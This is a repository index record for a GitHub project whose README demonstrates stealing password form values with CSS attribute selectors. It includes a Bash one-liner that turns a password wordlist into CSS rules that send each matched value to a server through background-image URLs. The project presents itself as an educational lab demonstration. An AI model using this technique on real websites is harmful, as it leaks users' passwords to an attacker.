{"id":15374457,"url":"https://github.com/ivan-sincek/css-dictionary-attack","last_synced_at":"2025-08-03T05:30:52.446Z","repository":{"id":107018885,"uuid":"170513891","full_name":"ivan-sincek/css-dictionary-attack","owner":"ivan-sincek","description":"Example on how to steal information with CSS from web forms.","archived":false,"fork":false,"pushed_at":"2021-08-06T08:55:50.000Z","size":105,"stargazers_count":2,"open_issues_count":0,"forks_count":3,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-10-17T16:21:25.768Z","etag":null,"topics":["css","defensive-security","dictionary","ethical-hacking","offensive-security","security","web","web-penetration-testing"],"latest_commit_sha":null,"homepage":"","language":"CSS","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-02-13T13:36:44.000Z","updated_at":"2024-08-12T19:45:47.000Z","dependencies_parsed_at":null,"dependency_job_id":"32df416b-5b07-4587-92a6-9fc7e6f352a4","html_url":"https://github.com/ivan-sincek/css-dictionary-attack","commit_stats":{"total_commits":1,"total_committers":1,"mean_commits":1.0,"dds":0.0,"last_synced_commit":"0331753c3253d9b255932d9e6a4d0dc3d0b244b4"},"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fcss-dictionary-attack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fcss-dictionary-attack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fcss-dictionary-attack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fcss-dictionary-attack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/css-dictionary-attack/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":228526750,"owners_count":17933291,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["css","defensive-security","dictionary","ethical-hacking","offensive-security","security","web","web-penetration-testing"],"created_at":"2024-10-01T13:58:49.985Z","updated_at":"2024-12-06T21:21:18.356Z","avatar_url":"https://github.com/ivan-sincek.png","language":"CSS","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CSS Dictionary \"Attack\"\n\nExample on how to steal information with CSS from web forms due to poor code quality or other vulnerabilities.\n\nAttack is only possible under very specific conditions. First, the server must echo targeted parameter's value back to the web form, second, you need to find a way to link your own CSS file or to modify an existing one.\n\nEven then it is hard to carry out this type of attack due to a large dictionary file size and high RAM consumption.\n\nTested on XAMPP for Windows v7.4.3 (64-bit) with Chrome v80.0.3987.149 (64-bit) and Firefox v74.0 (64-bit).\n\nMade for educational purposes. I hope it will help!\n\n## How to Run\n\nImport [\\\\db\\\\css_dictionary.sql](https://github.com/ivan-sincek/css-dictionary-attack/blob/master/db/css_dictionary.sql) to your database server.\n\nCopy all the content from [\\\\src\\\\](https://github.com/ivan-sincek/css-dictionary-attack/tree/master/src) to your server's web root directory (e.g. to \\\\xampp\\\\htdocs\\\\ on XAMPP).\n\nChange the database settings inside [\\\\src\\\\api\\\\php\\\\config.ini](https://github.com/ivan-sincek/css-dictionary-attack/blob/master/src/api/php/config.ini) as necessary.\n\nNavigate to the website with your preferred web browser.\n\n---\n\nTo transform an already existing dictionary to the CSS dictionary, run the following Bash command (modify it to your need):\n\n```bash\nfor word in $(cat rockyou_1000.txt); do echo \"input[name=pwd][value=\\\"${word}\\\"]{background-image:url(http://localhost/api/css.php?v=${word})}\"; done \u003e rockyou_1000.css\n```\n\n**Check an already existing dictionary [here](https://github.com/ivan-sincek/css-dictionary-attack/blob/master/dict) and the CSS dictionary [here](https://github.com/ivan-sincek/css-dictionary-attack/blob/master/src/css/rockyou_1000.css).**\n\n## Images\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/css-dictionary-attack/blob/master/img/dictionary.jpg\" alt=\"CSS Dictionary\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 1 - CSS Dictionary\u003c/p\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fcss-dictionary-attack","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Fcss-dictionary-attack","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fcss-dictionary-attack/lists"}